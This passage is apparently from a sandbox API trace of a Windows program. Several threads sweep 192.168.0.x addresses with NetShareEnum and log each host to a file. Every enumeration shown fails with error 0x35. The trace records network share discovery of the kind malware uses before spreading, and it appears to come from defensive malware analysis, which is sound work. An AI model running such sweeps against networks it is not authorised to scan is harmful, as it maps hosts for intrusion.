[0178.411] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x2fdfc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x2fdfc54*=0x11, lpOverlapped=0x0) returned 1 [0178.414] NetShareEnum (in: servername="\\\\192.168.0.180", level=0x1, bufptr=0x2fdfedc, prefmaxlen=0xffffffff, entriesread=0x2fdfed4, totalentries=0x2fdfed0, resume_handle=0x2fdfecc | out: bufptr=0x2fdfedc, entriesread=0x2fdfed4, totalentries=0x2fdfed0, resume_handle=0x2fdfecc) returned 0x35 [0211.194] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.219", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0211.194] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.219", cchWideChar=15, lpMultiByteStr=0x1e82f0c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.219", lpUsedDefaultChar=0x0) returned 15 [0211.194] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2fdfc2c, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x2fdfc2c*=0x80, lpOverlapped=0x0) returned 1 [0211.281] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x2fdec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0211.281] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0211.281] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0211.281] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x2fdec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0211.281] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0211.281] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0211.281] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2fdfc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x2fdfc54*=0x8, lpOverlapped=0x0) returned 1 [0211.282] NetShareEnum (in: servername="\\\\192.168.0.219", level=0x1, bufptr=0x2fdfedc, prefmaxlen=0xffffffff, entriesread=0x2fdfed4, totalentries=0x2fdfed0, resume_handle=0x2fdfecc | out: bufptr=0x2fdfedc, entriesread=0x2fdfed4, totalentries=0x2fdfed0, resume_handle=0x2fdfecc) returned 0x35 [0258.061] SetEvent (hEvent=0x1dc) returned 1 [0258.061] RtlExitUserThread (Status=0x0) Thread: id = 32 os_tid = 0xc0c [0088.251] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.11", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0088.251] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.11", cchWideChar=14, lpMultiByteStr=0x1e82f0c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.11", lpUsedDefaultChar=0x0) returned 14 [0088.251] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x311ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0088.251] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0088.251] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0088.251] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x311ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0088.251] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0088.251] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0088.251] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x311fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x311fc54*=0x10, lpOverlapped=0x0) returned 1 [0088.252] NetShareEnum (in: servername="\\\\192.168.0.11", level=0x1, bufptr=0x311fedc, prefmaxlen=0xffffffff, entriesread=0x311fed4, totalentries=0x311fed0, resume_handle=0x311fecc | out: bufptr=0x311fedc, entriesread=0x311fed4, totalentries=0x311fed0, resume_handle=0x311fecc) returned 0x35 [0144.043] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.76", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0144.043] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.76", cchWideChar=14, lpMultiByteStr=0x1e82f0c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.76", lpUsedDefaultChar=0x0) returned 14 [0144.043] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x311ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0144.043] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0144.043] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0144.043] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x311ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0144.043] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0144.043] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0144.043] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x311fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x311fc54*=0x10, lpOverlapped=0x0) returned 1 [0144.048] NetShareEnum (in: servername="\\\\192.168.0.76", level=0x1, bufptr=0x311fedc, prefmaxlen=0xffffffff, entriesread=0x311fed4, totalentries=0x311fed0, resume_handle=0x311fecc | out: bufptr=0x311fedc, entriesread=0x311fed4, totalentries=0x311fed0, resume_handle=0x311fecc) returned 0x35 [0178.467] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.188", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0178.467] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.188", cchWideChar=15, lpMultiByteStr=0x1e82f0c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.188", lpUsedDefaultChar=0x0) returned 15 [0178.467] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x311ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0178.467] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0178.467] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0178.467] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x311ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0178.467] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0178.468] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0178.468] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x311fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x311fc54*=0x11, lpOverlapped=0x0) returned 1 [0178.471] NetShareEnum (in: servername="\\\\192.168.0.188", level=0x1, bufptr=0x311fedc, prefmaxlen=0xffffffff, entriesread=0x311fed4, totalentries=0x311fed0, resume_handle=0x311fecc | out: bufptr=0x311fedc, entriesread=0x311fed4, totalentries=0x311fed0, resume_handle=0x311fecc) returned 0x35 [0211.195] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.221", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0211.195] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.221", cchWideChar=15, lpMultiByteStr=0x1e82f4c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.221", lpUsedDefaultChar=0x0) returned 15 [0211.195] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x311fc2c, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x311fc2c*=0x80, lpOverlapped=0x0) returned 1 [0211.285] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x311ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0211.285] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0211.285] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0211.285] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x311ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0211.285] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0211.285] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0211.285] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x311fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x311fc54*=0x11, lpOverlapped=0x0) returned 1 [0211.285] NetShareEnum (in: servername="\\\\192.168.0.221", level=0x1, bufptr=0x311fedc, prefmaxlen=0xffffffff, entriesread=0x311fed4, totalentries=0x311fed0, resume_handle=0x311fecc | out: bufptr=0x311fedc, entriesread=0x311fed4, totalentries=0x311fed0, resume_handle=0x311fecc) returned 0x35 [0258.061] SetEvent (hEvent=0x1dc) returned 1 [0258.061] RtlExitUserThread (Status=0x0) Thread: id = 33 os_tid = 0xc10 [0088.253] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.12", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0088.253] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.12", cchWideChar=14, lpMultiByteStr=0x1e82f0c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.12", lpUsedDefaultChar=0x0) returned 14 [0088.253] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x325ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0088.253] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0088.253] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0088.253] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x325ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0088.253] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0088.253] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0088.253] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x325fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x325fc54*=0x10, lpOverlapped=0x0) returned 1 [0088.254] NetShareEnum (in: servername="\\\\192.168.0.12", level=0x1, bufptr=0x325fedc, prefmaxlen=0xffffffff, entriesread=0x325fed4, totalentries=0x325fed0, resume_handle=0x325fecc | out: bufptr=0x325fedc, entriesread=0x325fed4, totalentries=0x325fed0, resume_handle=0x325fecc) returned 0x35 [0134.425] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.75", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0134.425] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.75", cchWideChar=14, lpMultiByteStr=0x1e82f0c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.75", lpUsedDefaultChar=0x0) returned 14 [0134.425] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x325ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0134.425] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0134.425] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0134.425] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x325ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0134.425] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0134.425] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0134.425] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x325fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x325fc54*=0x10, lpOverlapped=0x0) returned 1 [0144.026] NetShareEnum (in: servername="\\\\192.168.0.75", level=0x1, bufptr=0x325fedc, prefmaxlen=0xffffffff, entriesread=0x325fed4, totalentries=0x325fed0, resume_handle=0x325fecc | out: bufptr=0x325fedc, entriesread=0x325fed4, totalentries=0x325fed0, resume_handle=0x325fecc) returned 0x35 [0178.473] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.189", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0178.473] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.189", cchWideChar=15, lpMultiByteStr=0x1e82f0c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.189", lpUsedDefaultChar=0x0) returned 15 [0178.473] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x325ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0178.473] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0178.473] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0178.473] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x325ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0178.473] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0178.473] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0178.473] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x325fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x325fc54*=0x11, lpOverlapped=0x0) returned 1 [0178.477] NetShareEnum (in: servername="\\\\192.168.0.189", level=0x1, bufptr=0x325fedc, prefmaxlen=0xffffffff, entriesread=0x325fed4, totalentries=0x325fed0, resume_handle=0x325fecc | out: bufptr=0x325fedc, entriesread=0x325fed4, totalentries=0x325fed0, resume_handle=0x325fecc) returned 0x35 [0211.217] SetEvent (hEvent=0x1dc) returned 1 [0211.217] RtlExitUserThread (Status=0x0) Thread: id = 34 os_tid = 0xc14 [0088.255] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.13", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0088.255] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.13", cchWideChar=14, lpMultiByteStr=0x1e82f0c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.13", lpUsedDefaultChar=0x0) returned 14 [0088.256] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x339ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0088.256] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0088.256] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0088.256] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x339ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0088.256] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0088.256] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0088.256] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x339fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x339fc54*=0x10, lpOverlapped=0x0) returned 1 [0088.256] NetShareEnum (in: servername="\\\\192.168.0.13", level=0x1, bufptr=0x339fedc, prefmaxlen=0xffffffff, entriesread=0x339fed4, totalentries=0x339fed0, resume_handle=0x339fecc | out: bufptr=0x339fedc, entriesread=0x339fed4, totalentries=0x339fed0, resume_handle=0x339fecc) returned 0x35 [0134.416] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.74", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0134.416] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.74", cchWideChar=14, lpMultiByteStr=0x1e82f0c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.74", lpUsedDefaultChar=0x0) returned 14 [0134.417] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x339ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0134.417] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0134.417] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0134.417] MultiByteToWideChar 